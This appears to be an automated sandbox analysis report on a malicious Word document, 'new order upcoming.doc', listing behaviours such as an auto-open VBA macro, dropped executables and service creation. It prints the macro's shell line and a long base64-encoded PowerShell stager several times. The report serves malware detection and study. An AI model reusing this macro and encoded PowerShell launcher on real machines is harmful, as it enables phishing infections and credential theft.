Drops executables to the windows directory (C:\Windows) and starts themShow sources
Source: C:\Windows\System32\QYIyP.exeExecutable created and started: C:\Windows\system32\QYIyP.exe
Source: C:\Windows\System32\wlangdi.exeExecutable created and started: C:\Windows\System32\wlangdi.exe

Data Obfuscation:

barindex
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exeCode function: 4_2_004F1D8F VirtualAlloc,memcpy,memcpy,LoadLibraryA,GetProcAddress,VirtualFree,4_2_004F1D8F
PE file contains an invalid checksumShow sources
Source: QYIyP.exe.7.drStatic PE information: real checksum: 0x9ed163c7 should be: 0x1e39a
Source: 39530.exe.2.drStatic PE information: real checksum: 0x0 should be: 0x21090
PE file contains sections with non-standard namesShow sources
Source: QYIyP.exe.7.drStatic PE information: section name: .code
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exeCode function: 4_2_004F11E4 push ds; retf 4_2_004F13A5
Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exeCode function: 4_2_004F1010 push ss; retf 4_2_004F1011
Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exeCode function: 5_2_003E1010 push ss; retf 5_2_003E1011
Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exeCode function: 5_2_003E11E4 push ds; retf 5_2_003E13A5
Source: C:\Windows\System32\wlangdi.exeCode function: 6_2_002E11E4 push ds; retf 6_2_002E13A5
Source: C:\Windows\System32\wlangdi.exeCode function: 6_2_002E1010 push ss; retf 6_2_002E1011
Source: C:\Windows\System32\wlangdi.exeCode function: 7_2_002E11E4 push ds; retf 7_2_002E13A5
Source: C:\Windows\System32\wlangdi.exeCode function: 7_2_002E1010 push ss; retf 7_2_002E1011
Source: C:\Windows\System32\QYIyP.exeCode function: 8_2_0051122A push ds; retf 8_2_005113A5
Source: C:\Windows\System32\QYIyP.exeCode function: 8_2_005111E4 push ds; retf 8_2_005113A5
Source: C:\Windows\System32\QYIyP.exeCode function: 8_2_00511010 push ss; retf 8_2_00511011
Source: C:\Windows\System32\QYIyP.exeCode function: 9_2_00A011E4 push ds; retf 9_2_00A013A5
Source: C:\Windows\System32\QYIyP.exeCode function: 9_2_00A0122A push ds; retf 9_2_00A013A5
Source: C:\Windows\System32\QYIyP.exeCode function: 9_2_00A01010 push ss; retf 9_2_00A01011
Binary contains a suspicious time stampShow sources
Source: initial sampleStatic PE information: 0xE784FEEB [Sat Jan 31 15:08:27 2093 UTC]
Document contains an embedded VBA with many string operations indicating source code obfuscationShow sources
Source: new order upcoming.docStream path 'Macros/VBA/Module1' : High number of string operations
Source: VBA code instrumentationOLE, VBA macro, High number of string operations: Module Module1Name: Module1

Spreading:

barindex
Enumerates the file systemShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch

System Summary:

barindex
Checks whether correct version of .NET is installedShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\Upgrades
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Uses Microsoft SilverlightShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
Checks if Microsoft Office is installedShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_USERS\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Document has a 'comments' value indicative for goodwareShow sources
Source: new order upcoming.docInitial sample: OLE summary comments = poWERShell -e WwBzAHQAUgBJAG4ARwBdADoAOgBKAE8AaQBuACgAIAAnACcALAAoACgAIAAzADYAIAAsACAAMQAxADkAIAAsADEAMQA1ACwAIAA5ADkALAAgADEAMQA0ACAALAAxADAANQAgACwAIAAxADEAMgAgACwAMQAxADYAIAAsADMAMgAsACAANgAxACAALAAgADMAMgAsACAAMQAxADAALAAgADEAMAAxACAALAAxADEAOQAsACAANAA1ACAALAAgADEAMQAxACwAIAA5ADgAIAAsACAAMQAwADYAIAAsACAAMQAwADEAIAAsACAAOQA5ACAALAAxADEANgAgACwAIAAzADIAIAAsACAANAA1ACAALAA2ADcALAAxADEAMQAsADEAMAA5ACwAIAA3ADkALAAgADkAOAAsACAAMQAwADYALAAgADEAMAAxACAALAAgADkAOQAgACwAIAAxADEANgAsADMAMgAsACAAOAA3ACAALAAgADgAMwAsACAAOQA5ACAALAAxADEANAAsACAAMQAwADUAIAAsACAAMQAxADIALAAxADEANgAgACwAIAA0ADYALAA4ADMAIAAsACAAMQAwADQAIAAsACAAMQAwADEALAAxADAAOAAgACwAIAAxADAAOAAsADUAOQAgACwAMwA2ACwAIAAxADEAOQAgACwAMQAwADEALAA5ADgAIAAsACAAOQA5ACwAIAAxADAAOAAgACwAIAAxADAANQAgACwAMQAwADEALAAgADEAMQAwACAALAAgADEAMQA2ACwAMwAyACAALAAgADYAMQAgACwAMwAyACwAIAAxADEAMAAsACAAMQAwADEALAAxADEAOQAsADQANQAgACwAIAAxADEAMQAsACAAOQA4ACAALAAxADAANgAgACwAMQAwADEAIAAsACAAOQA5ACAALAAgADEAMQA2ACwAMwAyACAALAA4ADMAIAAsADEAMgAxACwAIAAxADEANQAg
Uses new MSVCR DllsShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll
Binary contains paths to debug symbolsShow sources
Source: Binary string: C:\Symbols\aagmmc.pdb source: wlangdi.exe
Source: Binary string: D:\office\Target\word\x86\ship\0\msword.PDB source: WINWORD.EXE
Source: Binary string: mscorrc.pdb source: powershell.exe
Source: Binary string: TEQUILABOOMBOOMWilbertSCCWadminSystemITC:\Symbols\aagmmc.pdbKLONE_X64-PCJohn DoeBEA-CHIJohnC:\take_screenshot.ps1C:\loaddll.exeC:\email.docC:\email.htmC:\123\email.docC:\123\email.docxC:\a\foobar.bmpC:\a\foobar.docC:\a\foobar.gif source: wlangdi.exe
Source: Binary string: 0=TEQUILABOOMBOOMWilbertSCCWadminSystemITC:\Symbols\aagmmc.pdbKLONE_X64-PCJohn DoeBEA-CHIJohnC:\take_screenshot.ps1C:\loaddll.exeC:\email.docC:\email.htmC:\123\email.docC:\123\email.docxC:\a\foobar.bmpC:\a\foobar.docC:\a\foobar.gif*F source: 39530.exe
Source: Binary string: D:\office\Target\outlook\x86\ship\1033\mapiR.pdb source: wlangdi.exe
Source: Binary string: mspdbsrv_winx86_100.pdb source: wlangdi.exe, 39530.exe.2.dr
Source: Binary string: 0@TEQUILABOOMBOOMWilbertSCCWadminSystemITC:\Symbols\aagmmc.pdbKLONE_X64-PCJohn DoeBEA-CHIJohnC:\take_screenshot.ps1C:\loaddll.exeC:\email.docC:\email.htmC:\123\email.docC:\123\email.docxC:\a\foobar.bmpC:\a\foobar.docC:\a\foobar.gif source: wlangdi.exe
Source: Binary string: 0@TEQUILABOOMBOOMWilbertSCCWadminSystemITC:\Symbols\aagmmc.pdbKLONE_X64-PCJohn DoeBEA-CHIJohnC:\take_screenshot.ps1C:\loaddll.exeC:\email.docC:\email.htmC:\123\email.docC:\123\email.docxC:\a\foobar.bmpC:\a\foobar.docC:\a\foobar.gif*F source: wlangdi.exe
Source: Binary string: 0PTEQUILABOOMBOOMWilbertSCCWadminSystemITC:\Symbols\aagmmc.pdbKLONE_X64-PCJohn DoeBEA-CHIJohnC:\take_screenshot.ps1C:\loaddll.exeC:\email.docC:\email.htmC:\123\email.docC:\123\email.docxC:\a\foobar.bmpC:\a\foobar.docC:\a\foobar.gif source: QYIyP.exe
Source: Binary string: 0-TEQUILABOOMBOOMWilbertSCCWadminSystemITC:\Symbols\aagmmc.pdbKLONE_X64-PCJohn DoeBEA-CHIJohnC:\take_screenshot.ps1C:\loaddll.exeC:\email.docC:\email.htmC:\123\email.docC:\123\email.docxC:\a\foobar.bmpC:\a\foobar.docC:\a\foobar.gif*F source: wlangdi.exe
Source: Binary string: mspdbsrv_winx86_100.pdb@: source: wlangdi.exe, 39530.exe.2.dr
Source: Binary string: c:\Projects\VS2005\mailpv\Command-Line\mailpv.pdb source: wlangdi.exe
Source: Binary string: c:\Projects\VS2005\WebBrowserPassView\Command-Line\WebBrowserPassView.pdb source: wlangdi.exe
Source: Binary string: 0NTEQUILABOOMBOOMWilbertSCCWadminSystemITC:\Symbols\aagmmc.pdbKLONE_X64-PCJohn DoeBEA-CHIJohnC:\take_screenshot.ps1C:\loaddll.exeC:\email.docC:\email.htmC:\123\email.docC:\123\email.docxC:\a\foobar.bmpC:\a\foobar.docC:\a\foobar.gif*F source: 39530.exe
Source: Binary string: D:\office\Target\outlook\x86\ship\1033\mapiR.pdbPDB source: wlangdi.exe
Document has a 'bytes' value indicative for goodwareShow sources
Source: new order upcoming.docInitial sample: OLE document summary bytes = 55296
Binary contains paths to development resourcesShow sources
Source: WINWORD.EXEBinary or memory string: Unrecognized project languageSThe .VBP file for this project contains an invalid or corrupt library references ID=Error accessing file. Network connection may have been lost.-Fixed or static data can't be larger than 64K
Classification labelShow sources
Source: classification engineClassification label: mal100.evad.expl.phis.spyw.troj.winDOC@25/11@1/5
Contains functionality to create servicesShow sources
Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exeCode function: lstrcmpiW,memset,memset,SHFileOperationW,GetTempPathW,GetTempFileNameW,SHFileOperationW,SHFileOperationW,OpenSCManagerW,CreateServiceW,OpenServiceW,EnumServicesStatusExW,GetLastError,GetProcessHeap,RtlAllocateHeap,EnumServicesStatusExW,OpenServiceW,QueryServiceConfig2W,GetLastError,GetProcessHeap,RtlAllocateHeap,QueryServiceConfig2W,GetProcessHeap,HeapFree,CloseServiceHandle,GetProcessHeap,HeapFree,ChangeServiceConfig2W,GetProcessHeap,HeapFree,StartServiceW,CloseServiceHandle,CloseServiceHandle,memset,CreateProcessW,CloseHandle,CloseHandle,5_2_003E8ABC
Source: C:\Windows\System32\wlangdi.exeCode function: lstrcmpiW,memset,memset,SHFileOperationW,GetTempPathW,GetTempFileNameW,SHFileOperationW,SHFileOperationW,OpenSCManagerW,CreateServiceW,OpenServiceW,EnumServicesStatusExW,GetLastError,GetProcessHeap,RtlAllocateHeap,EnumServicesStatusExW,OpenServiceW,QueryServiceConfig2W,GetLastError,GetProcessHeap,RtlAllocateHeap,QueryServiceConfig2W,GetProcessHeap,HeapFree,CloseServiceHandle,GetProcessHeap,HeapFree,ChangeServiceConfig2W,GetProcessHeap,HeapFree,StartServiceW,CloseServiceHandle,CloseServiceHandle,memset,CreateProcessW,CloseHandle,CloseHandle,7_2_002E8ABC
Source: C:\Windows\System32\QYIyP.exeCode function: lstrcmpiW,memset,memset,SHFileOperationW,GetTempPathW,GetTempFileNameW,SHFileOperationW,SHFileOperationW,OpenSCManagerW,CreateServiceW,OpenServiceW,EnumServicesStatusExW,GetLastError,GetProcessHeap,RtlAllocateHeap,EnumServicesStatusExW,OpenServiceW,QueryServiceConfig2W,GetLastError,GetProcessHeap,RtlAllocateHeap,QueryServiceConfig2W,GetProcessHeap,HeapFree,CloseServiceHandle,GetProcessHeap,HeapFree,ChangeServiceConfig2W,GetProcessHeap,HeapFree,StartServiceW,CloseServiceHandle,CloseServiceHandle,memset,CreateProcessW,CloseHandle,CloseHandle,9_2_00A08ABC
Contains functionality to enum processes or threadsShow sources
Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exeCode function: 4_2_004F8197 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,lstrlenW,GetProcessHeap,RtlAllocateHeap,lstrcmpiW,lstrcpyW,lstrlenW,GetProcessHeap,HeapFree,4_2_004F8197
Contains functionality to modify services (start/stop/modify)Show sources
Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exeCode function: 5_2_003E8ABC lstrcmpiW,memset,memset,SHFileOperationW,GetTempPathW,GetTempFileNameW,SHFileOperationW,SHFileOperationW,OpenSCManagerW,CreateServiceW,OpenServiceW,EnumServicesStatusExW,GetLastError,GetProcessHeap,RtlAllocateHeap,EnumServicesStatusExW,OpenServiceW,QueryServiceConfig2W,GetLastError,GetProcessHeap,RtlAllocateHeap,QueryServiceConfig2W,GetProcessHeap,HeapFree,CloseServiceHandle,GetProcessHeap,HeapFree,ChangeServiceConfig2W,GetProcessHeap,HeapFree,StartServiceW,CloseServiceHandle,CloseServiceHandle,memset,CreateProcessW,CloseHandle,CloseHandle,5_2_003E8ABC
Creates files inside the program directoryShow sources
Source: C:\Windows\System32\wlangdi.exeFile created: C:\ProgramData\FDF4.tmp
Creates files inside the user directoryShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$w order upcoming.doc
Creates temporary filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\HERBBL~1\AppData\Local\Temp\CVR2623.tmp
Document contains an OLE Word Document stream indicating a Microsoft Word fileShow sources
Source: new order upcoming.docOLE indicator, Word Document stream: true
Document contains summary information with irregular field valuesShow sources
Source: new order upcoming.docOLE document summary: title field not present or empty
Source: new order upcoming.docOLE document summary: edited time not present or 0
Parts of this applications are using the .NET runtime (Probably coded in C#)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Queries a list of all open handlesShow sources
Source: C:\Windows\System32\wlangdi.exeSystem information queried: HandleInformation
Reads ini filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.ini
Reads software policiesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
SQL strings found in memory and binary dataShow sources
Source: wlangdi.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: wlangdi.exeBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: wlangdi.exeBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: wlangdi.exeBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: wlangdi.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: wlangdi.exeBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: wlangdi.exeBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Sample is known by Antivirus (Virustotal or Metascan)Show sources
Source: new order upcoming.docVirustotal: hash found
Spawns processesShow sources
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\Desktop\new order upcoming.doc
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWERShell -e WwBzAHQAUgBJAG4ARwBdADoAOgBKAE8AaQBuACgAIAAnACcALAAoACgAIAAzADYAIAAsACAAMQAxADkAIAAsADEAMQA1ACwAIAA5ADkALAAgADEAMQA0ACAALAAxADAANQAgACwAIAAxADEAMgAgACwAMQAxADYAIAAsADMAMgAsACAANgAxACAALAAgADMAMgAsACAAMQAxADAALAAgADEAMAAxACAALAAxADEAOQAsACAANAA1ACAALAAgADEAMQAxACwAIAA5ADgAIAAsACAAMQAwADYAIAAsACAAMQAwADEAIAAsACAAOQA5ACAALAAxADEANgAgACwAIAAzADIAIAAsACAANAA1ACAALAA2ADcALAAxADEAMQAsADEAMAA5ACwAIAA3ADkALAAgADkAOAAsACAAMQAwADYALAAgADEAMAAxACAALAAgADkAOQAgACwAIAAxADEANgAsADMAMgAsACAAOAA3ACAALAAgADgAMwAsACAAOQA5ACAALAAxADEANAAsACAAMQAwADUAIAAsACAAMQAxADIALAAxADEANgAgACwAIAA0ADYALAA4ADMAIAAsACAAMQAwADQAIAAsACAAMQAwADEALAAxADAAOAAgACwAIAAxADAAOAAsADUAOQAgACwAMwA2ACwAIAAxADEAOQAgACwAMQAwADEALAA5ADgAIAAsACAAOQA5ACwAIAAxADAAOAAgACwAIAAxADAANQAgACwAMQAwADEALAAgADEAMQAwACAALAAgADEAMQA2ACwAMwAyACAALAAgADYAMQAgACwAMwAyACwAIAAxADEAMAAsACAAMQAwADEALAAxADEAOQAsADQANQAgACwAIAAxADEAMQAsACAAOQA4ACAALAAxADAANgAgACwAMQAwADEAIAAsACAAOQA5ACAALAAgADEAMQA2ACwAMwAyACAAL
Source: unknownProcess created: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe 'C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe'
Source: unknownProcess created: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe
Source: unknownProcess created: C:\Windows\System32\wlangdi.exe C:\Windows\system32\wlangdi.exe
Source: unknownProcess created: C:\Windows\System32\wlangdi.exe C:\Windows\system32\wlangdi.exe
Source: unknownProcess created: C:\Windows\System32\QYIyP.exe C:\Windows\system32\QYIyP.exe
Source: unknownProcess created: C:\Windows\System32\QYIyP.exe C:\Windows\system32\QYIyP.exe
Source: unknownProcess created: C:\Windows\System32\wlangdi.exe C:\Windows\system32\wlangdi.exe
Source: unknownProcess created: C:\Windows\System32\wlangdi.exe C:\Windows\system32\wlangdi.exe
Source: unknownProcess created: C:\Windows\System32\wlangdi.exe 'C:\Windows\system32\wlangdi.exe' /scomma 'C:\ProgramData\FDF4.tmp'
Source: unknownProcess created: C:\Windows\System32\wlangdi.exe 'C:\Windows\system32\wlangdi.exe' /scomma 'C:\ProgramData\FDF5.tmp'
Source: unknownProcess created: C:\Windows\System32\wlangdi.exe 'C:\Windows\system32\wlangdi.exe' 'C:\ProgramData\FDF6.tmp'
Source: unknownProcess created: C:\Windows\System32\wbem\WmiApSrv.exe C:\Windows\system32\wbem\WmiApSrv.exe
Source: unknownProcess created: C:\Windows\System32\wbem\WmiApSrv.exe C:\Windows\system32\wbem\WmiApSrv.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWERShell -e WwBzAHQAUgBJAG4ARwBdADoAOgBKAE8AaQBuACgAIAAnACcALAAoACgAIAAzADYAIAAsACAAMQAxADkAIAAsADEAMQA1ACwAIAA5ADkALAAgADEAMQA0ACAALAAxADAANQAgACwAIAAxADEAMgAgACwAMQAxADYAIAAsADMAMgAsACAANgAxACAALAAgADMAMgAsACAAMQAxADAALAAgADEAMAAxACAALAAxADEAOQAsACAANAA1ACAALAAgADEAMQAxACwAIAA5ADgAIAAsACAAMQAwADYAIAAsACAAMQAwADEAIAAsACAAOQA5ACAALAAxADEANgAgACwAIAAzADIAIAAsACAANAA1ACAALAA2ADcALAAxADEAMQAsADEAMAA5ACwAIAA3ADkALAAgADkAOAAsACAAMQAwADYALAAgADEAMAAxACAALAAgADkAOQAgACwAIAAxADEANgAsADMAMgAsACAAOAA3ACAALAAgADgAMwAsACAAOQA5ACAALAAxADEANAAsACAAMQAwADUAIAAsACAAMQAxADIALAAxADEANgAgACwAIAA0ADYALAA4ADMAIAAsACAAMQAwADQAIAAsACAAMQAwADEALAAxADAAOAAgACwAIAAxADAAOAAsADUAOQAgACwAMwA2ACwAIAAxADEAOQAgACwAMQAwADEALAA5ADgAIAAsACAAOQA5ACwAIAAxADAAOAAgACwAIAAxADAANQAgACwAMQAwADEALAAgADEAMQAwACAALAAgADEAMQA2ACwAMwAyACAALAAgADYAMQAgACwAMwAyACwAIAAxADEAMAAsACAAMQAwADEALAAxADEAOQAsADQANQAgACwAIAAxADEAMQAsACAAOQA4ACAALAAxADAANgAgACwAMQAwADEAIAAsACAAOQA5ACAALAAgADEAMQA2ACwAMwAyACAAL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe 'C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe'
Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exeProcess created: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe
Source: C:\Windows\System32\wlangdi.exeProcess created: C:\Windows\System32\wlangdi.exe C:\Windows\system32\wlangdi.exe
Source: C:\Windows\System32\wlangdi.exeProcess created: C:\Windows\System32\QYIyP.exe C:\Windows\system32\QYIyP.exe
Source: C:\Windows\System32\QYIyP.exeProcess created: C:\Windows\System32\QYIyP.exe C:\Windows\system32\QYIyP.exe
Source: C:\Windows\System32\wlangdi.exeProcess created: C:\Windows\System32\wlangdi.exe C:\Windows\system32\wlangdi.exe
Source: C:\Windows\System32\wlangdi.exeProcess created: C:\Windows\System32\wlangdi.exe 'C:\Windows\system32\wlangdi.exe' /scomma 'C:\ProgramData\FDF4.tmp'
Source: C:\Windows\System32\wlangdi.exeProcess created: C:\Windows\System32\wlangdi.exe 'C:\Windows\system32\wlangdi.exe' 'C:\ProgramData\FDF6.tmp'
Source: C:\Windows\System32\wlangdi.exeProcess created: C:\Windows\System32\wlangdi.exe 'C:\Windows\system32\wlangdi.exe' /scomma 'C:\ProgramData\FDF5.tmp'
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{77F10CF0-3DB5-4966-B520-B7C54FD35ED6}\InProcServer32
Contains functionality to launch a process as a different userShow sources
Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exeCode function: 5_2_003E20A9 memset,CreateProcessAsUserW,CreateProcessW,5_2_003E20A9
Creates files inside the system directoryShow sources
Source: C:\Windows\System32\wlangdi.exeFile created: C:\Windows\system32\QYIyP.exe
Creates mutexesShow sources
Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exeMutant created: \Sessions\1\BaseNamedObjects\Global\M1621D35E
Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exeMutant created: \Sessions\1\BaseNamedObjects\M9700BF63
Source: C:\Windows\System32\wlangdi.exeMutant created: \BaseNamedObjects\Global\I1621D35E
Source: C:\Windows\System32\QYIyP.exeMutant created: \BaseNamedObjects\MAC7BE04C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\CLR_PerfMon_WrapMutex
Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exeMutant created: \Sessions\1\BaseNamedObjects\Global\I1621D35E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\wlangdi.exeMutant created: \BaseNamedObjects\M20A03E5E
Document contains an embedded VBA macro which reads document properties (may be used for disguise)Show sources
Source: new order upcoming.docOLE, VBA macro line: vba.shell$ "" + hgrrdtcwnfx + gugydafkr + lntbabdw + uzfpbzsbduh + ryfawrsecf + dnkhhvry + activedocument.builtindocumentproperties("co" + "mments") + hgrrdtcwnfx + gugydafkr + lntbabdw + uzfpbzsbduh + ryfawrsecf + dnkhhvry + frdsdgytpw, 0
Document contains embedded VBA macrosShow sources
Source: new order upcoming.docOLE indicator, VBA macros: true
Reads the hosts fileShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\wlangdi.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\wlangdi.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\wlangdi.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\wlangdi.exeFile read: C:\Windows\System32\drivers\etc\hosts
Document contains an embedded VBA macro which executes code when the document is opened / closedShow sources
Source: new order upcoming.docOLE, VBA macro line: Sub autoopen()
Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function autoopenName: autoopen
Document contains an embedded VBA macro which may execute processesShow sources
Source: new order upcoming.docOLE, VBA macro line: VBA.Shell$ "" + HgrrDtcWNfx + gUgyDafKR + LNtbaBDw + UZfPbzsbDuH + RYFaWrSEcf + DnKhHvRY + ActiveDocument.BuiltInDocumentProperties("Co" + "mments") + HgrrDtcWNfx + gUgyDafKR + LNtbaBDw + UZfPbzsbDuH + RYFaWrSEcf + DnKhHvRY + fRDSDGyTPw, 0
Very long command line foundShow sources
Source: unknownProcess created: Commandline size = 6498
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: Commandline size = 6498

HIPS / PFW / Operating System Protection Evasion:

barindex
Very long cmdline option found, this is very uncommon (may be encrypted or packed)Show sources
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWERShell -e WwBzAHQAUgBJAG4ARwBdADoAOgBKAE8AaQBuACgAIAAnACcALAAoACgAIAAzADYAIAAsACAAMQAxADkAIAAsADEAMQA1ACwAIAA5ADkALAAgADEAMQA0ACAALAAxADAANQAgACwAIAAxADEAMgAgACwAMQAxADYAIAAsADMAMgAsACAANgAxACAALAAgADMAMgAsACAAMQAxADAALAAgADEAMAAxACAALAAxADEAOQAsACAANAA1ACAALAAgADEAMQAxACwAIAA5ADgAIAAsACAAMQAwADYAIAAsACAAMQAwADEAIAAsACAAOQA5ACAALAAxADEANgAgACwAIAAzADIAIAAsACAANAA1ACAALAA2ADcALAAxADEAMQAsADEAMAA5ACwAIAA3ADkALAAgADkAOAAsACAAMQAwADYALAAgADEAMAAxACAALAAgADkAOQAgACwAIAAxADEANgAsADMAMgAsACAAOAA3ACAALAAgADgAMwAsACAAOQA5ACAALAAxADEANAAsACAAMQAwADUAIAAsACAAMQAxADIALAAxADEANgAgACwAIAA0ADYALAA4ADMAIAAsACAAMQAwADQAIAAsACAAMQAwADEALAAxADAAOAAgACwAIAAxADAAOAAsADUAOQAgACwAMwA2ACwAIAAxADEAOQAgACwAMQAwADEALAA5ADgAIAAsACAAOQA5ACwAIAAxADAAOAAgACwAIAAxADAANQAgACwAMQAwADEALAAgADEAMQAwACAALAAgADEAMQA2ACwAMwAyACAALAAgADYAMQAgACwAMwAyACwAIAAxADEAMAAsACAAMQAwADEALAAxADEAOQAsADQANQAgACwAIAAxADEAMQAsACAAOQA4ACAALAAxADAANgAgACwAMQAwADEAIAAsACAAOQA5ACAALAAgADEAMQA2ACwAMwAyACAAL
